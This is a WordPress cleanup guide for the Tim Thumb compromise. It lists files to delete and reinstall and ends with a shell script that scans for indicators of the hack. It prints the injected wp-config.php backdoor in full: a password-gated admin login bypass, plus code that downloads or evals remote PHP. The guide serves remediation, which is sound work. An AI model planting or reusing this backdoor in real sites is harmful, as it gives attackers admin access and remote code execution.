How To Clean Up The “Tim Thumb” Hack

Updated November 15th, 2017

What is Tim Thumb?

Tim Thumb is a PHP script that handles web images; it is used to resize, crop and enlarge JPG, PNG and GIF images. It was first developed and used as part of the Mimbo Pro WordPress theme, but it was so popular that it ended up on most websites.

As with most new plugins or code that gain popularity so quickly, attackers took an interest as well. They discovered that the script could be exploited and used to redirect traffic, as well as to redirect e-mails to third-party sites.

The vulnerability was fixed quickly and the code was updated. But even today, not everyone is aware that they were compromised, and many continue to use the old script.

Luckily, there is a way to find out whether you are compromised because you are still running the old version of the script. Visit your website or blog (you may have to use a browser you don’t normally use, or log out of your website first). If, when trying to visit the website, you’re redirected to a Google safety warning page that says something like “Warning: Something’s Not Right Here!”, then you have a problem. That message can be caused by many things, and a hacked “Tim Thumb” script is one of them.

There is also a Tim Thumb vulnerability checker, which is more likely to find the issue. It is a plugin you install: it scans your website for the vulnerability and can also upgrade you to the safe Tim Thumb version. You can also do the update manually.

How To Fix The Tim Thumb Hack

You’re going to need to delete a few files from your WordPress directory:

  • /wp-admin/upd.php
  • /wp-content/upd.php

Then, you need to reinstall these files:

  • /wp-settings.php
  • /wp-includes/js/jquery/jquery.js
  • /wp-includes/js/l10n.js

Last, but not least, you’ll need to open wp-config.php and delete the code that was injected through the Tim Thumb vulnerability. This is what the bad code looks like:

if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
  // Only requests carrying the attacker's hard-coded password hash get past this check
  if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
    // 'login': signs the visitor in as the 'admin' account without any password
    if ($_GET['pingnow'] == 'login') {
      $user_login = 'admin';
      $user = get_userdatabylogin($user_login);
      $user_id = $user->ID;
      wp_set_current_user($user_id, $user_login);
      wp_set_auth_cookie($user_id);
      do_action('wp_login', $user_login);
    }
    // 'exec': downloads a remote file into a randomly named .php file and redirects to it
    if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
      $ch = curl_init($_GET['file']);
      $fnm = md5(rand(0, 100)) . '.php';
      $fp = fopen($fnm, "w");
      curl_setopt($ch, CURLOPT_FILE, $fp);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      curl_exec($ch);
      curl_close($ch);
      fclose($fp);
      echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
    }
    // 'eval': fetches remote PHP and runs it in memory, leaving no file on disk
    if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
      $ch = curl_init($_GET['file']);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      $re = curl_exec($ch);
      curl_close($ch);
      eval($re);
    }
  }
}

There will also be some Tim Thumb cache files that you’ll have to remove (themename is your theme’s directory name, and {MD5Hash} is a 32-character hex string):

  • /wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
  • /wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

All of the code must be deleted.

After you’ve deleted the malicious code, you need to install a fresh, updated Tim Thumb version and, just to be safe, change the password for your website and your MySQL password as well. The MySQL password is the one in your wp-config.php that allows WordPress to connect to the database.
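As an added example that is not part of the original post, here is a small POSIX shell triage script that checks a WordPress root for the indicators listed above: the two upd.php files, the pingnow block in wp-config.php, and external_*.php files in the theme cache directories. It only reports what it finds; the theme directory name themename, the DB_NAME line and the hash in the cache file name are constructed for the demonstration.

```shell
#!/bin/sh
# Added triage helper (not from the original post). Reports the indicators the
# post names under a WordPress root; it never deletes anything itself.

# Print one "KIND: path" line per indicator found under the WordPress root $1.
scan_wp_root() {
  root=$1
  # 1. Dropped files the post says to delete outright
  for f in wp-admin/upd.php wp-content/upd.php; do
    [ -f "$root/$f" ] && echo "DROPPED FILE: $root/$f"
  done
  # 2. Injected block in wp-config.php: match its 'pingnow' parameter or the
  #    hard-coded password hash quoted in the post (fixed strings, no regex)
  if [ -f "$root/wp-config.php" ] &&
     grep -qF -e "\$_GET['pingnow']" -e "19ca14e7ea6328a42e0eb13d585e4c22" "$root/wp-config.php"; then
    echo "INJECTED CODE: $root/wp-config.php"
  fi
  # 3. Tim Thumb cache payloads: external_<hash>.php in either theme cache location
  for d in "$root"/wp-content/themes/*/scripts/cache "$root"/wp-content/themes/*/temp/cache; do
    [ -d "$d" ] || continue
    for c in "$d"/external_*.php; do
      [ -f "$c" ] && echo "CACHED PAYLOAD: $c"
    done
  done
  return 0
}

# Number of indicators found (0 means none of the post's signs were present).
count_indicators() {
  scan_wp_root "$1" | wc -l | tr -d ' '
}

# Constructed sample tree mirroring the post's layout; the hash is a made-up placeholder.
make_infected_sample() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/wp-admin" "$tmp/wp-content/themes/themename/scripts/cache" \
           "$tmp/wp-content/themes/themename/temp/cache"
  : > "$tmp/wp-admin/upd.php"
  : > "$tmp/wp-content/upd.php"
  printf '%s\n' "<?php" "define('DB_NAME', 'wp');" \
    "if (isset(\$_GET['pingnow'])&& isset(\$_GET['pass'])) {" > "$tmp/wp-config.php"
  : > "$tmp/wp-content/themes/themename/scripts/cache/external_0123456789abcdef0123456789abcdef.php"
  echo "$tmp"
}

# Stand-alone run: scan the constructed sample and print what a compromised site reports.
sample=$(make_infected_sample)
scan_wp_root "$sample"
rm -rf "$sample"
```

Run it against a real install with `scan_wp_root /path/to/wordpress`; an empty report means none of the post's indicators are present, not that the site is clean.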

Once you’ve done all of that, you have cleaned up the Tim Thumb hack. This is a good lesson: we often assume that things are ‘safe’ and that everything will work as it should, but in reality we can’t be sure that the plugins we install are safe from hacking, or that the person who wrote the plugin has good intentions. Sometimes it’s wise to wait a while when new plugins come out, so that there is time to see whether it becomes a target before you install it. Sometimes there’s no time for that, so make sure you back up your website and database when you install new plugins!
